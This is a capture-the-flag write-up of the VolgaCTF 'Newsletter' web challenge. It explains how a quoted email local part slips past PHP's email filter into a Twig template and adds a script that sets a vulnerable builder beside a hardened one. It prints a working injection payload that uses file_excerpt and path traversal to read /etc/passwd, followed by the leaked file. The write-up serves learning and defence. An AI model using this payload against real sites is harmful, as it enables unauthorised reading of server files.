Newsletter
[web]
newsletter
Subscribe to our newsletter!
Recon
We are provided the following source code:
<?php
namespace App\Controller;

use Symfony\Bundle\FrameworkBundle\Controller\AbstractController;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\Mailer\MailerInterface;
use Symfony\Component\Mime\Email;

class MainController extends AbstractController
{
    public function index(Request $request)
    {
        return $this->render('main.twig');
    }

    public function subscribe(Request $request, MailerInterface $mailer)
    {
        $msg = '';
        // Format validation only: FILTER_VALIDATE_EMAIL does not restrict which
        // characters may appear in a (quoted) local part.
        $email = filter_var($request->request->get('email', ''), FILTER_VALIDATE_EMAIL);
        if($email !== FALSE) {
            // Everything before the first '@' becomes the greeting name ...
            $name = substr($email, 0, strpos($email, '@'));
            // ... and is interpolated into the template *source* before Twig compiles it,
            // so any {{ ... }} in the local part is executed as Twig code.
            $content = $this->get('twig')->createTemplate(
                "<p>Hello ${name}.</p><p>Thank you for subscribing to our newsletter.</p><p>Regards, VolgaCTF Team</p>"
            )->render();
            $mail = (new Email())->from('newsletter@newsletter.q.2020.volgactf.ru')->to($email)->subject('VolgaCTF Newsletter')->html($content);
            $mailer->send($mail);
            $msg = 'Success';
        } else {
            $msg = 'Invalid email';
        }
        return $this->render('main.twig', ['msg' => $msg]);
    }

    public function source()
    {
        return new Response('<pre>'.htmlspecialchars(file_get_contents(__FILE__)).'</pre>');
    }
}
This is a PHP web application built on the Symfony framework.
The challenge website lets us submit an email address, and it then sends an email to that address.
If we enter user+{{2+4}}@mydomain.tld, the email greets us as user+6: the part of the address before the '@' is interpolated into the template source handed to createTemplate(), so Twig evaluates the expression. This confirms Twig template injection.
We look at PayloadsAllTheThings for some inspiration.
But we also have to deal with PHP's FILTER_VALIDATE_EMAIL, which the source code applies to our input before anything else:
$email = filter_var($request->request->get('email', ''), FILTER_VALIDATE_EMAIL);
There is also a 72 (or 62) character limit.
Thankfully it's PHP, so there's usually a way to break things :)
In this case by using a quoted local part: "user+{{}}"@mydomain.tld
FILTER_VALIDATE_EMAIL accepts the quoted-string form of the local part, in which characters such as parentheses, commas and consecutive dots are allowed even though a bare local part rejects them, and the controller's substr() copies the whole quoted string, quotes included, straight into the template source. Whatever we put between the braces is therefore compiled by Twig.
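The two points above, the controller's interpolation of the local part into the template source and the permissiveness of FILTER_VALIDATE_EMAIL, shown in a stand-alone PHP script that places the vulnerable greeting builder beside a hardened one. This is an added example, not code from the challenge or from Symfony/Twig; it assumes Twig is installed with composer require twig/twig, and the function names, the probe addresses and the allow-list pattern are this example's own assumptions, not anything the challenge uses.

```php
<?php
// Added example, not the challenge's code: the greeting builder from the
// controller above, side by side with a hardened version.
// Assumes Twig is installed with `composer require twig/twig`; function names,
// probe addresses and the allow-list pattern are this example's own choices.
declare(strict_types=1);

require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Error\Error as TwigError;
use Twig\Loader\ArrayLoader;

// Same construction as the challenge: the local part of the address is pasted
// into the template *source*, so Twig compiles whatever the user typed.
function renderGreetingVulnerable(Environment $twig, string $input): ?string
{
    $email = filter_var($input, FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        return null;                       // rejected by the format check
    }
    $name = substr($email, 0, strpos($email, '@'));
    // "{$name}" is PHP string interpolation (equivalent to "${name}" in the
    // original, which PHP 8.2 deprecates): it runs before Twig sees the string.
    return $twig->createTemplate(
        "<p>Hello {$name}.</p><p>Thank you for subscribing to our newsletter.</p>"
    )->render();
}

// Hardened version, two independent layers:
//  1. the template source is a fixed string and the name is passed as a
//     context variable, so Twig treats it as data and HTML-escapes it;
//  2. the greeting name is allow-listed, because FILTER_VALIDATE_EMAIL also
//     accepts quoted local parts ("...") that may contain almost any printable
//     character. Anything else is greeted generically instead of being echoed.
function renderGreetingSafe(Environment $twig, string $input): ?string
{
    $email = filter_var($input, FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        return null;
    }
    // Split on the last '@': a quoted local part may itself contain '@'.
    $local = substr($email, 0, strrpos($email, '@'));
    $name = preg_match('/^[A-Za-z0-9._+-]{1,64}$/', $local) ? $local : 'subscriber';
    return $twig->createTemplate(
        '<p>Hello {{ name }}.</p><p>Thank you for subscribing to our newsletter.</p>'
    )->render(['name' => $name]);
}

$twig = new Environment(new ArrayLoader());

// Constructed probe addresses: a normal one, the write-up's {{2+4}} probe, and
// the same probe inside a quoted local part (also accepted by filter_var).
$probes = [
    'alice@mydomain.tld',
    'user+{{2+4}}@mydomain.tld',
    '"user+{{2+4}}"@mydomain.tld',
];

foreach ($probes as $probe) {
    echo "input:      {$probe}\n";
    try {
        echo 'vulnerable: ', renderGreetingVulnerable($twig, $probe) ?? '(rejected)', "\n";
    } catch (TwigError $e) {
        // Malformed injected syntax surfaces here as a Twig compile error.
        echo 'vulnerable: ', get_class($e), "\n";
    }
    echo 'hardened:   ', renderGreetingSafe($twig, $probe) ?? '(rejected)', "\n\n";
}
```

Run it with php example.php after installing Twig. The vulnerable builder evaluates the {{2+4}} expression in both the bare and the quoted form, while the hardened builder keeps the braces out of the template source altogether: the address is still accepted, but the name is only used as data, and an unusual local part is replaced by a generic greeting rather than being reproduced in mail sent from the site's own domain.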
Exploit
"user+{{'../../../../../etc/passwd'|file_excerpt(0,-1)}}"@mydomain.tld
The email we receive (file_excerpt is the filter from Symfony's Twig bridge CodeExtension that renders source listings on its error pages; a negative context such as -1 makes it return the entire file as an HTML ordered list):
<p>Hello "user+</p><ol start="1"><li><a name="line1"></a><code>root:x:0:0:root:/root:/bin/bash</code></li>
<li><a name="line2"></a><code>daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</code></li>
<li><a name="line3"></a><code>bin:x:2:2:bin:/bin:/usr/sbin/nologin</code></li>
<li><a name="line4"></a><code>sys:x:3:3:sys:/dev:/usr/sbin/nologin</code></li>
<li><a name="line5"></a><code>sync:x:4:65534:sync:/bin:/bin/sync</code></li>
<li><a name="line6"></a><code>games:x:5:60:games:/usr/games:/usr/sbin/nologin</code></li>
<li><a name="line7"></a><code>man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</code></li>
<li><a name="line8"></a><code>lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</code></li>
<li><a name="line9"></a><code>mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</code></li>
<li><a name="line10"></a><code>news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</code></li>
<li><a name="line11"></a><code>uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</code></li>
<li><a name="line12"></a><code>proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</code></li>
<li><a name="line13"></a><code>www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</code></li>
<li><a name="line14"></a><code>backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</code></li>
<li><a name="line15"></a><code>list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</code></li>
<li><a name="line16"></a><code>irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin</code></li>
<li><a name="line17"></a><code>gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</code></li>
<li><a name="line18"></a><code>nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</code></li>
<li><a name="line19"></a><code>systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin</code></li>
<li><a name="line20"></a><code>systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin</code></li>
<li><a name="line21"></a><code>syslog:x:102:106::/home/syslog:/usr/sbin/nologin</code></li>
<li><a name="line22"></a><code>messagebus:x:103:107::/nonexistent:/usr/sbin/nologin</code></li>
<li><a name="line23"></a><code>_apt:x:104:65534::/nonexistent:/usr/sbin/nologin</code></li>
<li><a name="line24"></a><code>lxd:x:105:65534::/var/lib/lxd/:/bin/false</code></li>
<li><a name="line25"></a><code>uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin</code></li>
<li><a name="line26"></a><code>dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin</code></li>
<li><a name="line27"></a><code>landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin</code></li>
<li><a name="line28"></a><code>sshd:x:109:65534::/run/sshd:/usr/sbin/nologin</code></li>
<li><a name="line29"></a><code>pollinate:x:110:1::/var/cache/pollinate:/bin/false</code></li>
<li><a name="line30"></a><code>postfix:x:111:116::/var/spool/postfix:/usr/sbin/nologin</code></li>
<li><a name="line31"></a><code>flag:x:1000:1000:VolgaCTF_6751602deea2a308ab611eeef7a4e961:/home/flag:/bin/false</code></li>
<li><a name="line32"></a><code></code></li></ol>".<p></p><p>Thank you for subscribing to our newsletter.</p><p>Regards, VolgaCTF Team</p>
Flag
VolgaCTF_6751602deea2a308ab611eeef7a4e961